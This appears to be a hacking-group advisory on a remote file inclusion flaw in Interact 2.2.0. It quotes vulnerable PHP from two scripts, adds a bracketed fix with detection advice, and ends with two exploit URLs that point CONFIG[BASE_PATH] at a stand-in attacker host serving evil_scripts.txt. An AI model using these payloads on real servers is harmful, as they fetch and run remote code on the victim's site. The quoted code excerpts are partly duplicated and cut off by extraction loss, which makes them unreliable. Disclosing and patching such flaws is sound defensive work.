
interact <= 2.2 (CONFIG) Remote File Include Vulnerability






/*=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
-   - - [Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - -=0D
+=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
- Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Remote File Include Vulnerability=0D
+=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
- [Script name: Interact - Online Learning and Collaboration System v. 2.2.0=0D
- [Script site: https://sourceforge.net/projects/cce-interact/=0D
+=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
-          Find by: CarcaBot=0D
+=0D
- Contact: CarcaBotx@yahoo.com=0D 
-                        or=0D
- http://Hacking.CarcaBot.ro=0D 
+=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
- Special Greetz: CarcaBot=0D
- http://Hacking.CarcaBot.ro=0D 
-=0D
+=0D
*/=0D
/*=0D
vulnerable code => admin/autoprompter.php line 33-38:=0D
....=0D
=0D
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');=0D
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');=0D
=0D
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,=0D
{$CONFIG['DB_PREFIX']}posts.subject,=0D
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,=0D
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM=0D
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces=0D
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key=0D
WHERE=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key=0D
AND=0D
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey=0D
AND=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey=0D
AND=0D
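{$CONFIG['DB_PREFIX']}posts.date_added [... text between "<" and ">" lost in extraction; presumably the end of this query and the "$rs = $CONN->" that opens the repeated excerpt below ...]
Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,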
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,=0D
{$CONFIG['DB_PREFIX']}posts.subject,=0D
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,=0D
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM=0D
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces=0D
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key=0D
WHERE=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key=0D
AND=0D
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey=0D
AND=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey=0D
AND=0D
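{$CONFIG['DB_PREFIX']}posts.date_added [... text between "<" and ">" lost in extraction; presumably the end of the query and a "vulnerable code =>" label like the one on the first excerpt ...]
includes/common.inc.php line 35-40: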
....=0D
=0D
$CONFIG['ADODB_PATH']    = $CONFIG['BASE_PATH'].'/includes/adodb';=0D
//Include database abstraction classes=0D
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');=0D
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');=0D
=0D
....=0D
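Exploit Fix:
[Note: the added require_once loads the local configuration before $CONFIG['BASE_PATH'] is first used, so the include path comes from the application's own config instead of from the request.
 This holds only if config.inc.php assigns $CONFIG['BASE_PATH'] unconditionally. The relative path '../local/config.inc.php' is resolved against the working directory of the running script, so verify it from every entry point.
 The fix is shown for includes/common.inc.php only. admin/autoprompter.php passes the same variable to require_once and needs $CONFIG defined before that line too, unless it already loads the config earlier than the excerpt shows.
 The request parameter can reach $CONFIG only when PHP copies request variables into globals (presumably register_globals = On). Turning that off, and keeping allow_url_include off (allow_url_fopen on PHP versions without that directive), removes this class of bug.
 Detection: check web server logs for requests to either script that carry a CONFIG[BASE_PATH] parameter.]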
includes/common.inc.php line 35-40:=0D
....=0D
=0D
require_once('../local/config.inc.php');=0D
$CONFIG['ADODB_PATH']    = $CONFIG['BASE_PATH'].'/includes/adodb';=0D
//Include database abstraction classes=0D
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');=0D
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');=0D
=0D
=0D
*/=0D
#Exploit:=0D
=0D
http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]=0D 
=0D
http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]=0D 
### End of File ###=0D
### http://Hacking.CarcaBot.ro ### 
